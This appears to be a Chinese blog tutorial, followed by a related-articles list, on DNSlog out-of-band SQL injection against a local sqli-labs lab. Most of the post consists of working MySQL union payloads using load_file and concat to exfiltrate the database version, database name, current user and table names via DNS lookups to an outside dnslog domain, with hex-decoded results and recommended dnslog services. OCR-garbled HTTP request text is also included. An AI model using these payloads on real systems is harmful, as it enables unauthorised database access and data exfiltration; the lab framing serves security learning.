更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

能够利用dnslog进行注入的两个关键点:secure_file_priv 不能为NULL,仅支持 Windows但不支持 Linux

show variables like '%secure%';查看load_file()可以读取的磁盘。

1、当secure_file_priv为空,就可以读取磁盘的目录。

2、当secure_file_priv为G:\,就可以读取G盘的文件。

3、当secure_file_priv为null,load_file就不能加载文件。

为了达到实验目的,在本地虚拟机环境进行调试。

mysql配置文件进行如下改动

my.ini 设置为secure_file_priv=空  然后重启 进入数据库验证 show variables like '%secure%'

这里使用sqlilabs的环境,如下图基本时间盲注判断

计算机生成了可选文字:<br /> Request<br /> ParamsHeadersHex<br /> GET/sqlilabs/Less-S/?id=1%27%20AND%20SLEEP(S〕%20一一+HITP<br /> Host:192.15&35.132<br /> Upgrade-Insecure-Requests:1<br /> User-Agent:Mozi巧.0OuVindowsNT100AOA54<br /> 14.0<br /> Response<br /> HeadersHexHTMLRender<br /> HITP/I.1200OK<br /> Date:Fri,01Nov201908:10℃5GMT<br /> Server:Apache/2.4.230in32〕OpenSSL/1.0.2jPHP/5」」5<br /> X-Powered-8y:PHP/5」」5<br /> Content-Length:720<br /> Connection.Close<br /> Content-Type:text/html<br /> <!DOCTYPEhtmlPUBLIC.一//':.BC,夕D丆DX1Transitional//EN"<br /> AppleWebKit/S37.36(KHTML,likeGecko〕Chrome/6S.0.<br /> Safar丿537.35SE2MetaSr1.<br /> Accept:<br /> e/apng,*/*,q=0.8<br /> Accept-Language:Zh-<br /> Connection.Close<br /> n巳<br /> text/html,application/xhtml+xml,application/xml,q=0.9,image/webp,imag<br /> CN,zh;q=0.9<br /> Typeasearchrm<br /> 0matches<br /> "http://mvw.w3.org/TR/xhtm11/DTD/xhtm11-transitionaLdtd"><br /> <htmlxmlns="http://www.w3.org/1999/×htm"><br /> <head><br /> <metahttp-equiv="Content-Type"c0ntent="text/html;<br /> charset=utf-8"/><br /> <title>Less-5DoubleQuery-SingleQuotes-String</title><br /> </head><br /> <bodybgcolor=引#000000引><br /> <divstye=margin-top:60px;color.#FFF•font-size:23px;<br /> text-align:center">Wclcomc&nbsp;&nbsp;&nbsp;<font<br /> color=<br /> "#FF0000引>Dhakkan</font><br><br /> <fontS=<br /> 3引color:"#FFFFOO"><br /> <fontSize:<br /> 骂"color:"#FFFFOO"></br></font><fontcolor:<br /> "#0000ff"fontsi7P=3><br /> Typeasearchrm<br /> matches<br /> 924bytes《5,022millis

查询数据库版本' union select load_file(concat('\\\\',version(),'.XXX\\aaa')),2,3%23

回到dnslog查看,成功返回数据库版本信息

查询数据库名' union select load_file(concat('\\\\',database(),'.t00ls.XXX.tu4.org\\aaa')),2,3%23

查询当前用户@符号在查询时要使用hex函数进行16进制编码' union select load_file(concat('\\\\',(select hex(user())),'.t00ls.XXX.tu4.org\\abc')),2,3%23

返回结果为编码后的

726F6F74406C6F63616C686F7374进行解码

计算机生成了可选文字:<br /> Hex编码/解码<br /> 在下面的文本框内输入需要处理的内容<br /> 囗带%亻寸号<br /> root@localhost<br /> UTF-8<br /> GB2312<br /> 编码<br /> 解码

查询数据库表名

' union select load_file(concat('\\\\',(select hex(group_concat(table_name)) from information_schema.tables where table_schema='security'),'.t00ls.XXX.tu4.org\\aaaa')),2,3%23

一样这里用的group_caoncat函数也是需要转码的656D61696C732C72656665726572732C756167656E74732C7573657273解码后如下

计算机生成了可选文字:<br /> 0<br /> https://www.<br /> 107000.com/T一He×/<br /> Hex编码/解码<br /> 回.'回<br /> 在下面的文本框内输入需要处理的内容<br /> 囗带%亻寸号<br /> emails,referers,uagents,users<br /> UTF-8<br /> GB2312<br /> 编码<br /> 解码

我这里演示用的是吐司的dnslog,同样别的平台也是可以的,推荐几个平台:http://www.dnslog.cn/、http://ceye.io/

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

利用dnslog进行sql注入的更多相关文章

  1. 利用DNS实现SQL注入带外查询(OOB)

    根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inference(经典SQL注入),inband(盲注.推理注入.带内注入)和out-of-band 一.什么是OOB out-of-ban ...

  2. 利用PreparedStatement预防SQL注入

    1.什么是sql注入 SQL 注入是用户利用某些系统没有对输入数据进行充分的检查,从而进行恶意破坏的行为. 例如登录用户名采用  ' or 1=1 or username=‘,后台数据查询语句就变成 ...

  3. Web安全测试学习笔记-SQL注入-利用concat和updatexml函数

    mysql数据库中有两个函数:concat和updatexml,在sql注入时经常组合使用,本文通过学习concat和updatexml函数的使用方法,结合实例来理解这种sql注入方式的原理. con ...

  4. 一篇文章带你了解SQL注入

    什么是SQL注入? 原理: Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令 危害: 注入可能导致数据丢失泄露或数据破坏.缺乏可审计性,有时甚至能导致完全接管 ...

  5. c# 登录 防止sql注入 mysql数据库

    利用参数化 防止SQL注入 public string serachName(string name) { string result = ""; try { conn.Open( ...

  6. 转:攻击JavaWeb应用[4]-SQL注入[2]

    转:http://static.hx99.net/static/drops/tips-288.html 攻击JavaWeb应用[4]-SQL注入[2] 园长 · 2013/07/18 17:23 注: ...

  7. 如何通过SQL注入获取服务器本地文件

    写在前面的话 SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏.针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在 ...

  8. sql注入攻防 以php+mysql为例

    随着Web应用的高速发展和技术的不断成熟,对Web开发相关职位的需求量也越来越大,越来越多的人加入了Web开发的行列.但是由于程序员的水平参差不齐或是安全意识太低,很多程序员在编写代码时仅考虑了功能上 ...

  9. 初探SQL注入需要知道的5个问题

    SQL注入产生原理 可控变量(注入点,就是传参) 带入数据库查询 变量未存在过滤或过滤不严谨 例子: 获取admin表的pass里面的数据 select * from users where id=1 ...

随机推荐

  1. ZLC众利币系统APP开发

    开发版本:APP 开发语言:php,java,.net 下面我们来看一下tp5 分页具体怎么用: 一, 分页简洁版 简洁分页仅仅只有上下页的分页输出,可以使用下面的简洁分页代码: // 查询状态为1的 ...

  2. expect——通过编写自动化脚本实现信息交互(整理)

    本文简要介绍了expect工具语言的功能.用法,并以实例来具体说明 expect是什么 Expect是一个免费的编程工具语言,用来完成通信过程中的交互式任务,而无需人的干预. 通过shell虽然可以实 ...

  3. DS AVL树详解

    先说说二叉搜索树: 是有序的二叉树,根值>左节点值,右节点值>根值. 如果要查找某个值,二叉搜索树和二分查找一样,每进行一次值比较,就会减少一半的遍历区间. 但是,如果树插入的值一直递增/ ...

  4. MacBook Pro配置汇编开发环境

    配置开发环境 方法一: 打开命令行,输入指令which nasm查看nasm的安装路径,Mac系统默认安装了nasm.一般默认返回的路径是/usr/bin/nasm 接着输入指令alias nasm= ...

  5. python爬虫-有道翻译-js加密破解

    有道翻译-js加密破解 这是本地爬取的网址:http://fanyi.youdao.com/ 一.分析请求 我们在页面中输入:水果,翻译后的英文就是:fruit.请求携带的参数有很多,先将参数数据保存 ...

  6. pandas-12 数学计算操作df.sum()、df.min()、df.max()、df.decribe()

    pandas-12 数学计算操作df.sum().df.min().df.max().df.decribe() 常用的数学计算无非就是加减,最大值最小值,方差等等,pandas已经内置了很多方法来解决 ...

  7. rsync安全

    rsync可能泄露敏感文件 常用操作列举整个同步目录或指定目录:Defaultrsync 10.0.0.12:: rsync 10.0.0.12::www/ 下载文件或目录到本地:Defaultrsy ...

  8. 使用Hybris commerce的promotion rule进行促销活动

    backoffice Marketing菜单下面,新建一个Promotion rule: Promotion的条件,设置成针对商城里所有的数码相机: Promotion触发条件在Conditions区 ...

  9. 为什么在定义hashcode时要使用31这个数呢?

    散列计算就是计算元素应该放在数组的哪个元素里.准确的说是放到哪个链表里面.按照Java的规则,如果你要想将一个对象放入HashMap中,你的对象的类必须提供hashcode方法,返回一个整数值. ht ...

  10. easyui datagrid treegrid 取消行选中、取消高亮

    .datagrid-row-selected{ background: #FFFFFF !important; color: #404040; } 一.思路来源:https://www.cnblogs ...